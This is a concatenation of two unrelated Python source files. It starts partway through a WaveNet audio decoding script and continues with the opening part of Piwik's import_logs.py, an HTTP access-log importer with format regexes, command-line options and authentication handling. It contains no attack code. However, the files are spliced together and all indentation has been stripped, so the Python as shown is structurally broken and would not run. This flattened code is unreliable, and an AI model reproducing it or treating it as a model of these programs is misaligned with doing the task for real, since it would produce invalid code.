if config.use_upsampling_layer:
upsampling_factor = config.upsampling_factor
else:
upsampling_factor = 0
model = WaveNet(
n_quantize=config.n_quantize,
n_aux=config.n_aux,
n_resch=config.n_resch,
n_skipch=config.n_skipch,
dilation_depth=config.dilation_depth,
dilation_repeat=config.dilation_repeat,
kernel_size=config.kernel_size,
upsampling_factor=upsampling_factor)
model.load_state_dict(torch.load(
args.checkpoint,
map_location=lambda storage,
loc: storage)["model"])
model.eval()
model.cuda()
# define generator
generator = decode_generator(
feat_list,
batch_size=args.batch_size,
feature_type=config.feature_type,
wav_transform=wav_transform,
feat_transform=feat_transform,
upsampling_factor=config.upsampling_factor,
use_upsampling_layer=config.use_upsampling_layer,
use_speaker_code=config.use_speaker_code)
# decode
if args.batch_size > 1:
for feat_ids, (batch_x, batch_h, n_samples_list) in generator:
logging.info("decoding start")
samples_list = model.batch_fast_generate(
batch_x, batch_h, n_samples_list, args.intervals)
for feat_id, samples in zip(feat_ids, samples_list):
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
else:
for feat_id, (x, h, n_samples) in generator:
logging.info("decoding %s (length = %d)" % (feat_id, n_samples))
samples = model.fast_generate(x, h, n_samples, args.intervals)
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
# parallel decode
processes = []
for gpu, feat_list in enumerate(feat_lists):
p = mp.Process(target=gpu_decode, args=(feat_list, gpu,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
import_logs.py
|
#!/usr/bin/python
# vim: et sw=4 ts=4:
# -*- coding: utf-8 -*-
#
# Piwik - free/libre analytics platform
#
# @link http://piwik.org
# @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
# @version $Id$
#
# For more info see: http://piwik.org/log-analytics/ and http://piwik.org/docs/log-analytics-tool-how-to/
#
# Requires Python 2.6 or greater.
#
import base64
import bz2
import ConfigParser
import datetime
import fnmatch
import gzip
import hashlib
import httplib
import inspect
import itertools
import logging
import optparse
import os
import os.path
import Queue
import re
import sys
import threading
import time
import urllib
import urllib2
import urlparse
import subprocess
import functools
import traceback
import socket
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
if sys.version_info < (2, 6):
print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.'
sys.exit(1)
##
## Constants.
##
STATIC_EXTENSIONS = set((
'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff class swf css js xml robots.txt'
).split())
DOWNLOAD_EXTENSIONS = set((
'7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flv gz gzip hqx '
'ibooks jar mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp '
'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm sea sit tar tbz '
'bz2 tbz tgz torrent txt wav wma wmv wpd xls xlsx xml xsd z zip '
'azw3 epub mobi apk'
).split())
# A good source is: http://phpbb-bots.blogspot.com/
EXCLUDED_USER_AGENTS = (
'adsbot-google',
'ask jeeves',
'baidubot',
'bot-',
'bot/',
'ccooter/',
'crawl',
'curl',
'echoping',
'exabot',
'feed',
'googlebot',
'ia_archiver',
'java/',
'libwww',
'mediapartners-google',
'msnbot',
'netcraftsurvey',
'panopta',
'robot',
'spider',
'surveybot',
'twiceler',
'voilabot',
'yahoo',
'yandex',
)
PIWIK_DEFAULT_MAX_ATTEMPTS = 3
PIWIK_DEFAULT_DELAY_AFTER_FAILURE = 10
DEFAULT_SOCKET_TIMEOUT = 300
PIWIK_EXPECTED_IMAGE = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='
)
##
## Formats.
##
class BaseFormatException(Exception): pass
class BaseFormat(object):
def __init__(self, name):
self.name = name
self.regex = None
self.date_format = '%d/%b/%Y:%H:%M:%S'
def check_format(self, file):
line = file.readline()
file.seek(0)
return self.check_format_line(line)
def check_format_line(self, line):
return False
class JsonFormat(BaseFormat):
def __init__(self, name):
super(JsonFormat, self).__init__(name)
self.json = None
self.date_format = '%Y-%m-%dT%H:%M:%S'
def check_format_line(self, line):
try:
self.json = json.loads(line)
return True
except:
return False
def match(self, line):
try:
self.json = json.loads(line)
return self
except:
self.json = None
return None
def get(self, key):
# Some ugly patches ...
if key == 'generation_time_milli':
self.json[key] = int(self.json[key] * 1000)
# Patch date format ISO 8601
elif key == 'date':
tz = self.json[key][19:]
self.json['timezone'] = tz.replace(':', '')
self.json[key] = self.json[key][:19]
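# e.g. a hypothetical "2017-04-01T12:00:00+02:00" becomes date "2017-04-01T12:00:00" with timezone "+0200"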
try:
return self.json[key]
except KeyError:
raise BaseFormatException()
def get_all(self,):
return self.json
def remove_ignored_groups(self, groups):
for group in groups:
del self.json[group]
class RegexFormat(BaseFormat):
def __init__(self, name, regex, date_format=None):
super(RegexFormat, self).__init__(name)
if regex is not None:
self.regex = re.compile(regex)
if date_format is not None:
self.date_format = date_format
self.matched = None
def check_format_line(self, line):
return self.match(line)
def match(self,line):
if not self.regex:
return None
match_result = self.regex.match(line)
if match_result:
self.matched = match_result.groupdict()
else:
self.matched = None
return match_result
def get(self, key):
try:
return self.matched[key]
except KeyError:
raise BaseFormatException("Cannot find group '%s'." % key)
def get_all(self,):
return self.matched
def remove_ignored_groups(self, groups):
for group in groups:
del self.matched[group]
class W3cExtendedFormat(RegexFormat):
FIELDS_LINE_PREFIX = '#Fields: '
fields = {
'date': '(?P<date>^\d+[-\d+]+',
'time': '[\d+:]+)[.\d]*?', # TODO: should not assume date & time will be together; not sure how to fix ATM.
'cs-uri-stem': '(?P<path>/\S*)',
'cs-uri-query': '(?P<query_string>\S*)',
'c-ip': '"?(?P<ip>[\d*.-]*)"?',
'cs(User-Agent)': '(?P<user_agent>".*?"|\S+)',
'cs(Referer)': '(?P<referrer>\S+)',
'sc-status': '(?P<status>\d+)',
'sc-bytes': '(?P<length>\S+)',
'cs-host': '(?P<host>\S+)',
'cs-username': '(?P<userid>\S+)',
'time-taken': '(?P<generation_time_secs>[.\d]+)'
}
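# A hypothetical header such as '#Fields: date time cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status'
# maps each field name to the corresponding regex fragment above when create_regex() builds the line regex.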
def __init__(self):
super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S')
def check_format(self, file):
self.create_regex(file)
# if we couldn't create a regex, this file does not follow the W3C extended log file format
if not self.regex:
file.seek(0)
return
first_line = file.readline()
file.seek(0)
return self.check_format_line(first_line)
def create_regex(self, file):
fields_line = None
if config.options.w3c_fields:
fields_line = config.options.w3c_fields
# collect all header lines up until the Fields: line
# if we're reading from stdin, we can't seek, so don't read any more than the Fields line
header_lines = []
while fields_line is None:
line = file.readline().strip()
if not line:
continue
if not line.startswith('#'):
break
if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX):
fields_line = line
else:
header_lines.append(line)
if not fields_line:
return
# store the header lines for a later check for IIS
self.header_lines = header_lines
# Parse the 'Fields: ' line to create the regex to use
full_regex = []
expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping
# if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds
if config.options.w3c_time_taken_in_millisecs:
expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)'
for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems():
expected_fields[mapped_field_name] = expected_fields[field_name]
del expected_fields[field_name]
# add custom field regexes supplied through --w3c-field-regex option
for field_name, field_regex in config.options.w3c_field_regexes.iteritems():
expected_fields[field_name] = field_regex
# Skip the 'Fields: ' prefix.
fields_line = fields_line[9:].strip()
for field in re.split('\s+', fields_line):
try:
regex = expected_fields[field]
except KeyError:
regex = '(?:".*?"|\S+)'
full_regex.append(regex)
full_regex = '\s+'.join(full_regex)
logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex)
self.regex = re.compile(full_regex)
def check_for_iis_option(self):
if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis():
logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS"
" stores millisecond values in the time-taken field. If your logfile does this, the aforementioned"
" option must be used in order to get accurate generation times.")
def _is_iis(self):
return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0
def _is_time_taken_milli(self):
return 'generation_time_milli' not in self.regex.pattern
class IisFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'time-taken': '(?P<generation_time_milli>[.\d]+)',
'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it
# will ensure we always select IIS for the format instead of
# W3C logs when detecting the format. This way there will be
# less accidental importing of IIS logs w/o --w3c-time-taken-milli.
})
def __init__(self):
super(IisFormat, self).__init__()
self.name = 'iis'
class AmazonCloudFrontFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'x-event': '(?P<event_action>\S+)',
'x-sname': '(?P<event_name>\S+)',
'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)',
'c-user-agent': '(?P<user_agent>".*?"|\S+)',
# following are present to match cloudfront instead of W3C when we know it's cloudfront
'x-edge-location': '(?P<x_edge_location>".*?"|\S+)',
'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)',
'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)',
'x-host-header': '(?P<x_host_header>".*?"|\S+)'
})
def __init__(self):
super(AmazonCloudFrontFormat, self).__init__()
self.name = 'amazon_cloudfront'
def get(self, key):
if key == 'event_category' and 'event_category' not in self.matched:
return 'cloudfront_rtmp'
elif key == 'status' and 'status' not in self.matched:
return '200'
elif key == 'user_agent':
user_agent = super(AmazonCloudFrontFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(AmazonCloudFrontFormat, self).get(key)
_HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+'
_COMMON_LOG_FORMAT = (
'(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)'
)
_NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT +
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_S3_LOG_FORMAT = (
'\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>\S+)\s+'
'\S+\s+\S+\s+\S+\s+\S+\s+"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+\S+\s+(?P<length>\S+)\s+'
'\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT +
'\s+(?P<session_time>\S+)'
)
FORMATS = {
'common': RegexFormat('common', _COMMON_LOG_FORMAT),
'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT),
'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT),
'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT),
'w3c_extended': W3cExtendedFormat(),
'amazon_cloudfront': AmazonCloudFrontFormat(),
'iis': IisFormat(),
's3': RegexFormat('s3', _S3_LOG_FORMAT),
'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT),
'nginx_json': JsonFormat('nginx_json'),
}
##
## Code.
##
class Configuration(object):
"""
Stores all the configuration options by reading sys.argv and parsing,
if needed, the config.inc.php.
It has 2 attributes: options and filenames.
"""
class Error(Exception):
pass
def _create_parser(self):
"""
Initialize and return the OptionParser instance.
"""
option_parser = optparse.OptionParser(
usage='Usage: %prog [options] log_file [ log_file [...] ]',
description="Import HTTP access logs to Piwik. "
"log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). "
" By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.",
epilog="About Piwik Server Log Analytics: http://piwik.org/log-analytics/ "
" Found a bug? Please create a ticket in http://dev.piwik.org/ "
" Please send your suggestions or successful user story to hello@piwik.org "
)
option_parser.add_option(
'--debug', '-d', dest='debug', action='count', default=0,
help="Enable debug output (specify multiple times for more verbose)",
)
option_parser.add_option(
'--url', dest='piwik_url',
help="REQUIRED Your Piwik server URL, eg. http://example.com/piwik/ or http://analytics.example.net",
)
option_parser.add_option(
'--dry-run', dest='dry_run',
action='store_true', default=False,
help="Perform a trial run with no tracking data being inserted into Piwik",
)
option_parser.add_option(
'--show-progress', dest='show_progress',
action='store_true', default=os.isatty(sys.stdout.fileno()),
help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)"
)
option_parser.add_option(
'--show-progress-delay', dest='show_progress_delay',
type='int', default=1,
help="Change the default progress delay"
)
option_parser.add_option(
'--add-sites-new-hosts', dest='add_sites_new_hosts',
action='store_true', default=False,
help="When a hostname is found in the log file, but not matched to any website "
"in Piwik, automatically create a new website in Piwik with this hostname to "
"import the logs"
)
option_parser.add_option(
'--idsite', dest='site_id',
help= ("When specified, "
"data in the specified log files will be tracked for this Piwik site ID."
" The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).")
)
option_parser.add_option(
'--idsite-fallback', dest='site_id_fallback',
help="Default Piwik site ID to use if the hostname doesn't match any "
"known Website's URL. New websites will not be automatically created. "
" Used only if --add-sites-new-hosts or --idsite are not set",
)
default_config = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../config/config.ini.php'),
)
option_parser.add_option(
'--config', dest='config_file', default=default_config,
help=(
"This is only used when --login and --password is not used. "
"Piwik will read the configuration file (default: %default) to "
"fetch the Super User token_auth from the config file. "
)
)
option_parser.add_option(
'--login', dest='login',
help="You can manually specify the Piwik Super User login"
)
option_parser.add_option(
'--password', dest='password',
help="You can manually specify the Piwik Super User password"
)
option_parser.add_option(
'--token-auth', dest='piwik_token_auth',
help="Piwik Super User token_auth, 32 characters hexadecimal string, found in Piwik > API",
)
option_parser.add_option(
'--hostname', dest='hostnames', action='append', default=[],
help="Accepted hostname (requests with other hostnames will be excluded). "
"Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path', dest='excluded_paths', action='append', default=[],
help="Any URL path matching this exclude-path will not be imported in Piwik. Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path-from', dest='exclude_path_from',
help="Each line from this file is a path to exclude (see: --exclude-path)"
)
option_parser.add_option(
'--include-path', dest='included_paths', action='append', default=[],
help="Paths to include. Can be specified multiple times. If not specified, all paths are included."
)
option_parser.add_option(
'--include-path-from', dest='include_path_from',
help="Each line from this file is a path to include"
)
option_parser.add_option(
'--useragent-exclude', dest='excluded_useragents',
action='append', default=[],
help="User agents to exclude (in addition to the standard excluded "
"user agents). Can be specified multiple times",
)
option_parser.add_option(
'--enable-static', dest='enable_static',
action='store_true', default=False,
help="Track static files (images, css, js, ico, ttf, etc.)"
)
option_parser.add_option(
'--enable-bots', dest='enable_bots',
action='store_true', default=False,
help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'"
)
option_parser.add_option(
'--enable-http-errors', dest='enable_http_errors',
action='store_true', default=False,
help="Track HTTP errors (status code 4xx or 5xx)"
)
option_parser.add_option(
'--enable-http-redirects', dest='enable_http_redirects',
action='store_true', default=False,
help="Track HTTP redirects (status code 3xx except 304)"
)
option_parser.add_option(
'--enable-reverse-dns', dest='reverse_dns',
action='store_true', default=False,
help="Enable reverse DNS, used to generate the 'Providers' report in Piwik. "
"Disabled by default, as it impacts performance"
)
option_parser.add_option(
'--strip-query-string', dest='strip_query_string',
action='store_true', default=False,
help="Strip the query string from the URL"
)
option_parser.add_option(
'--query-string-delimiter', dest='query_string_delimiter', default='?',
help="The query string delimiter (default: %default)"
)
option_parser.add_option(
'--log-format-name', dest='log_format_name', default=None,
help=("Access log format to detect (supported are: %s). "
"When not specified, the log format will be autodetected by trying all supported log formats."
% ', '.join(sorted(FORMATS.iterkeys())))
)
available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status',
'length', 'host', 'userid', 'generation_time_milli', 'event_action',
'event_name', 'timezone', 'session_time']
option_parser.add_option(
'--log-format-regex', dest='log_format_regex', default=None,
help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. "
"Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. "
"Overrides --log-format-name." % (', '.join(available_regex_groups))
)
option_parser.add_option(
'--log-hostname', dest='log_hostname', default=None,
help="Force this hostname for a log format that doesn't incldude it. All hits "
"will seem to came to this host"
)
option_parser.add_option(
'--skip', dest='skip', default=0, type='int',
help="Skip the n first lines to start parsing/importing data at a given line for the specified log file",
)
option_parser.add_option(
'--recorders', dest='recorders', default=1, type='int',
help="Number of simultaneous recorders (default: %default). "
"It should be set to the number of CPU cores in your server. "
"You can also experiment with higher values which may increase performance until a certain point",
)
option_parser.add_option(
'--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int',
help="Maximum number of log entries to record in one tracking request (default: %default). "
)
option_parser.add_option(
'--replay-tracking', dest='replay_tracking',
action='store_true', default=False,
help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee http://piwik.org/faq/how-to/faq_17033/"
)
option_parser.add_option(
'--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php',
help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults "
"to 'piwik.php' so only requests to the piwik.php file will be imported."
)
option_parser.add_option(
'--output', dest='output',
help="Redirect output (stdout and stderr) to the specified file"
)
option_parser.add_option(
'--encoding', dest='encoding', default='utf8',
help="Log files encoding (default: %default)"
)
option_parser.add_option(
'--disable-bulk-tracking', dest='use_bulk_tracking',
default=True, action='store_false',
help="Disables use of bulk tracking so recorders record one hit at a time."
)
option_parser.add_option(
'--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float',
help="Debug option that will force each recorder to record one hit every N secs."
)
option_parser.add_option(
'--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true',
help="Make URL path lowercase so paths with the same letters but different cases are "
"treated the same."
)
option_parser.add_option(
'--enable-testmode', dest='enable_testmode', default=False, action='store_true',
help="If set, it will try to get the token_auth from the piwik_tests directory"
)
option_parser.add_option(
'--download-extensions', dest='download_extensions', default=None,
help="By default Piwik tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped."
)
option_parser.add_option(
'--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string',
help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log "
"files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used "
"as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n"
"Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more "
"fields that can be mapped."
% (', '.join(W3cExtendedFormat.fields.keys()))
)
option_parser.add_option(
'--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs',
help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing"
" IIS logs."
)
option_parser.add_option(
'--w3c-fields', dest='w3c_fields', default=None,
help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if "
"your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used "
"in conjuction with --log-format-name=w3c_extended.\n"
"Example: --w3c-fields='#Fields: date time c-ip ...'"
)
option_parser.add_option(
'--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string',
help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the "
"importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track "
"the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) "
"--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field "
"in the 'Windows Status Code' custom variable. Regexes must contain a named group."
)
option_parser.add_option(
'--title-category-delimiter', dest='title_category_delimiter', default='/',
help="If --enable-http-errors is used, errors are shown in the page titles report. If you have "
"changed General.action_title_category_delimiter in your Piwik configuration, you need to set this "
"option to the same value in order to get a pretty page titles report."
)
option_parser.add_option(
'--dump-log-regex', dest='dump_log_regex', action='store_true', default=False,
help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats "
"in newer versions of the script in older versions of the script. The output regex can be used with "
"the --log-format-regex option."
)
option_parser.add_option(
'--ignore-groups', dest='regex_groups_to_ignore', default=None,
help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, "
"disable normal user id tracking. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string',
help="Track an attribute through a custom variable with visit scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string',
help="Track an attribute through a custom variable with page scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--retry-max-attempts', dest='max_attempts', default=PIWIK_DEFAULT_MAX_ATTEMPTS, type='int',
help="The maximum number of times to retry a failed tracking request."
)
option_parser.add_option(
'--retry-delay', dest='delay_after_failure', default=PIWIK_DEFAULT_DELAY_AFTER_FAILURE, type='int',
help="The number of seconds to wait before retrying a failed tracking request."
)
option_parser.add_option(
'--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int',
help="The maximum number of seconds to wait before terminating an HTTP request to Piwik."
)
return option_parser
def _set_option_map(self, option_attr_name, option, opt_str, value, parser):
"""
Sets a key-value mapping in a dict that is built from command line options. Options that map
string keys to string values (like --w3c-map-field) can set the callback to a bound partial
of this method to handle the option.
"""
parts = value.split('=')
if len(parts) != 2:
fatal_error("Invalid %s option: '%s'" % (opt_str, value))
key, value = parts
if not hasattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, {})
getattr(parser.values, option_attr_name)[key] = value
def _parse_args(self, option_parser):
"""
Parse the command line args and create self.options and self.filenames.
"""
self.options, self.filenames = option_parser.parse_args(sys.argv[1:])
if self.options.output:
sys.stdout = sys.stderr = open(self.options.output, 'a+', 0)
if not self.filenames:
print(option_parser.format_help())
sys.exit(1)
# Configure logging before calling logging.{debug,info}.
logging.basicConfig(
format='%(asctime)s: [%(levelname)s] %(message)s',
level=logging.DEBUG if self.options.debug >= 1 else logging.INFO,
)
self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents])
if self.options.exclude_path_from:
paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()]
self.options.excluded_paths.extend(path for path in paths if len(path) > 0)
if self.options.excluded_paths:
self.options.excluded_paths = set(self.options.excluded_paths)
logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths))
if self.options.include_path_from:
paths = [path.strip() for path in open(self.options.include_path_from).readlines()]
self.options.included_paths.extend(path for path in paths if len(path) > 0)
if self.options.included_paths:
self.options.included_paths = set(self.options.included_paths)
logging.debug('Included paths: %s', ' '.join(self.options.included_paths))
if self.options.hostnames:
logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames))
else:
logging.debug('Accepted hostnames: all')
if self.options.log_format_regex:
self.format = RegexFormat('custom', self.options.log_format_regex)
elif self.options.log_format_name:
try:
self.format = FORMATS[self.options.log_format_name]
except KeyError:
fatal_error('invalid log format: %s' % self.options.log_format_name)
else:
self.format = None
if not hasattr(self.options, 'custom_w3c_fields'):
self.options.custom_w3c_fields = {}
elif self.format is not None:
# validate custom field mappings
for custom_name, default_name in self.options.custom_w3c_fields.iteritems():
if default_name not in self.format.fields:
fatal_error("custom W3C field mapping error: don't know how to parse and use the '%s' field" % default_name)
return
if not hasattr(self.options, 'regex_group_to_visit_cvars_map'):
self.options.regex_group_to_visit_cvars_map = {}
if not hasattr(self.options, 'regex_group_to_page_cvars_map'):
self.options.regex_group_to_page_cvars_map = {}
if not hasattr(self.options, 'w3c_field_regexes'):
self.options.w3c_field_regexes = {}
else:
# make sure each custom w3c field regex has a named group
for field_name, field_regex in self.options.w3c_field_regexes.iteritems():
if '(?P<' not in field_regex:
fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name))
return
if not self.options.piwik_url:
fatal_error('no URL given for Piwik')
if not (self.options.piwik_url.startswith('http://') or self.options.piwik_url.startswith('https://')):
self.options.piwik_url = 'http://' + self.options.piwik_url
logging.debug('Piwik URL is: %s', self.options.piwik_url)
if not self.options.piwik_token_auth:
try:
self.options.piwik_token_auth = self._get_token_auth()
except Piwik.Error, e:
fatal_error(e)
logging.debug('Authentication token token_auth is: %s', self.options.piwik_token_auth)
if self.options.recorders < 1:
self.options.recorders = 1
if self.options.download_extensions:
self.options.download_extensions = set(self.options.download_extensions.split(','))
else:
self.options.download_extensions = DOWNLOAD_EXTENSIONS
if self.options.regex_groups_to_ignore:
self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(','))
def __init__(self):
self._parse_args(self._create_parser())
def _get_token_auth(self):
"""
If the token auth is not specified in the options, get it from Piwik.
"""
# Get superuser login/password from the options.
logging.debug('No token-auth specified')
if self.options.login and self.options.password:
piwik_login = self.options.login
piwik_password = hashlib.md5(self.options.password).hexdigest()
logging.debug('Using credentials: (login = %s, password = %s)', piwik_login, piwik_password)
try:
api_result = piwik.call_api('UsersManager.getTokenAuth',
userLogin=piwik_login,
md5Password=piwik_password,
_token_auth='',
_url=self.options.piwik_url,
)
except urllib2.URLError, e:
fatal_error('error when fetching token_auth from the API: %s' % e)
try:
return api_result['value']
except KeyError:
# Happens when the credentials are invalid.
message = api_result.get('message')
fatal_error(
'error fetching authentication token token_auth%s' % (
': %s' % message if message else '')
)
else:
# Fallback to the given (or default) configuration file, then
# get the token from the API.
logging.debug(
'No credentials specified, reading them from "%s"',
self.options.config_file,
)
config_file = ConfigParser.RawConfigParser()
success = len(config_file.read(self.options.config_file)) > 0
if not success:
fatal_error(
"the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable to get the authentication token"
)
updatetokenfile = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../misc/cron/updatetoken.php'),
)
phpBinary = 'php'
is_windows = sys.platform.startswith('win')
if is_windows:
try:
processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
[stdout, stderr] = processWin.communicate()
if processWin.returncode == 0:
phpBinary = stdout.strip()
else:
fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option")
except:
fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue")
command = [phpBinary, updatetokenfile]
if self.options.enable_testmode:
command.append('--testmode')
hostname = urlparse.urlparse( self.options.piwik_url ).hostname
command.append('--piwik-domain=' + hostname )
command = subprocess.list2cmdline(command)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
[stdout, stderr] = process.communicate()
if process.returncode != 0:
fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option")
filename = stdout
credentials = open(filename, 'r').readline()
credentials = credentials.split('\t')
return credentials[1]
def get_resolver(self):
if self.options.site_id:
logging.debug('Resolver: static')
return StaticResolver(self.options.site_id)
else:
logging.debug('Resolver: dynamic')
return DynamicResolver()
class Statistics(object):
"""
Store statistics about parsed logs and recorded entries.
Can optionally print statistics on standard output every second.
"""
class Counter(object):
"""
Simple integers cannot be used by multithreaded programs. See:
http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe
"""
def __init__(self):
# itertools.count's implementation in C does not release the GIL and
# therefore is thread-safe.
self.counter = itertools.count(1)
self.value = 0
def increment(self):
self.value = self.counter.next()
def advance(self, n):
for i in range(n):
self.increment()
def __str__(self):
return str(int(self.value))
def __init__(self):
self.time_start = None
self.time_stop = None
self.piwik_sites = set() # sites ID
self.piwik_sites_created = [] # (hostname, site ID)
self.piwik_sites_ignored = set() # hostname
self.count_lines_parsed = self.Counter()
self.count_lines_recorded = self.Counter()
# Lines that do not match the regexp.
self.count_lines_invalid = self.Counter()
# No site ID found by the resolver.
self.count_lines_no_site = self.Counter()
# Hostname filtered by config.options.hostnames
self.count_lines_hostname_skipped = self.Counter()
# Static files.
self.count_lines_static = self.Counter()
# Ignored user-agents.
self.count_lines_skipped_user_agent = self.Counter()
# Ignored HTTP errors.
self.count_lines_skipped_http_errors = self.Counter()
# Ignored HTTP redirects.
self.count_lines_skipped_http_redirects = self.Counter()
# Downloads
self.count_lines_downloads = self.Counter()
# Ignored downloads when --download-extensions is used
self.count_lines_skipped_downloads = self.Counter()
# Misc
self.dates_recorded = set()
self.monitor_stop = False
